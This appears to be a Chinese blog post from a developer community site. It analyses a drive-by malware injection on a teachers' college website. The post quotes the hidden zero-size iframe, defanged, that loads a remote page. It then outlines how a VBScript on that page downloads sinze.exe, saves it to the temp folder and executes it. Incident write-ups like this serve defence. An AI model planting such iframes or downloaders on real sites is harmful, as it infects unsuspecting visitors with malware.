AI 助理
备案控制台登录注册
开发者社区 云计算 文章 正文

01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an

2024-09-29 34 发布于浙江
版权
举报
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an

网站的网页被加入代码:

/------
<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>
------/

sin**ze*.htm   Kaspersky 报为 Trojan-Downloader.VBS.Psyme.ei。

在浏览器中打开该网页,会看到信息:

/------

就不让你看!气死你 by ******!

------/

其中******处的字符串可能是作者昵称,这里偶匿了。

还没完,网页中接下来有利用Replace()来保护自身的VBScript脚本,会利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%/g0ld.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

sinze.exe 采用 ASPack 加壳


游客qeoynko2nmbgk
+关注
363文章
目录
打赏
0
1
1
0
57
分享
相关文章
游客qeoynko2nmbgk
|
6月前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
游客qeoynko2nmbgk
30 3
游客qeoynko2nmbgk
|
6月前
|
缓存 算法 网络协议
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
游客qeoynko2nmbgk
37 2
游客qeoynko2nmbgk
|
6月前
|
安全 JavaScript 前端开发
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
游客qeoynko2nmbgk
41 1
游客qeoynko2nmbgk
|
6月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
游客qeoynko2nmbgk
30 1
游客qeoynko2nmbgk
|
6月前
|
安全 JavaScript 前端开发
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
游客qeoynko2nmbgk
32 1
游客qeoynko2nmbgk
|
6月前
|
JavaScript 前端开发 安全
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
游客qeoynko2nmbgk
36 2
游客qeoynko2nmbgk
|
6月前
|
安全 数据安全/隐私保护
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
游客qeoynko2nmbgk
45 1
游客qeoynko2nmbgk
|
6月前
数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
游客qeoynko2nmbgk
45 2
游客qeoynko2nmbgk
|
6月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
游客qeoynko2nmbgk
38 2
游客qeoynko2nmbgk
|
6月前
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
游客qeoynko2nmbgk
19 0

热门文章

最新文章

  • 1
    错误”ORA-12560: TNS: 协议适配器错误“解决方法
    1032
  • 2
    Mac 上 iterm2 和 VSCode 终端中的字体设置建议
    4773
  • 3
    免费IDM下载器序列号2023Internet Download Manager许可证
    45
  • 4
    不了解 QPS、TPS、RT、并发数、吞吐量,劝你简历别写熟悉高并发
    20
  • 5
    信用算力基于 RocketMQ 实现金融级数据服务的实践
    8877
  • 6
    Maven下载和配置教程:Windows、Mac和Linux系统安装指南
    7
  • 7
    Python参数配置库ConfigParser详解
    2
  • 8
    53.7. Control Flow Functions
    1
  • 9
    shell 脚本-----循环数组
    3
  • 10
    技术不是工程师能力的全部:闲看《因为所谓的代码性能不高而被离职的程序员》
    2
  • 1
    Resume Matcher:增加面试机会!开源AI简历优化工具,一键解析简历和职位描述并优化
    41
  • 2
    还在蹲Manus的邀请码?别等了!开源版Manus为你快速创建AI工位,给AI一台电脑,然后你就玩去吧!
    160
  • 3
    无需邀请码!MetaGPT 开源AI助手 OpenManus,实时反馈+模块化设计,开发者福音
    108
  • 4
    OWL:告别繁琐任务!开源多智能体系统实现自动化协作,效率提升10倍
    104
  • 5
    Redis应用—8.相关的缓存框架
    34
  • 6
    FileCodeBox:像拿快递一样轻松分享文件
    32
  • 7
    为襄阳职业技术学院最新推出的DeepSeek-R1-fix-XYTC:0908、DeepSeek-R1-fix-XYTC、Qwen-MAX-XYTC及DeepSeek-R1-XYTC多模态模型家族
    66
  • 8
    WebSocket 调试全攻略:核心解析、工具选择与对比!
    28
  • 9
    Understanding RESTful API and Web Services: Key Differences and Use Cases
    30
  • 10
    Chain of Draft: 借鉴人类草稿思维让大型语言模型更快地思考
    34

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    阿里云负载均衡SLB版本CLB、ALB和NLB有什么区别如何选择?
    AI助理

    你好,我是AI助理

    可以解答问题、推荐解决方案等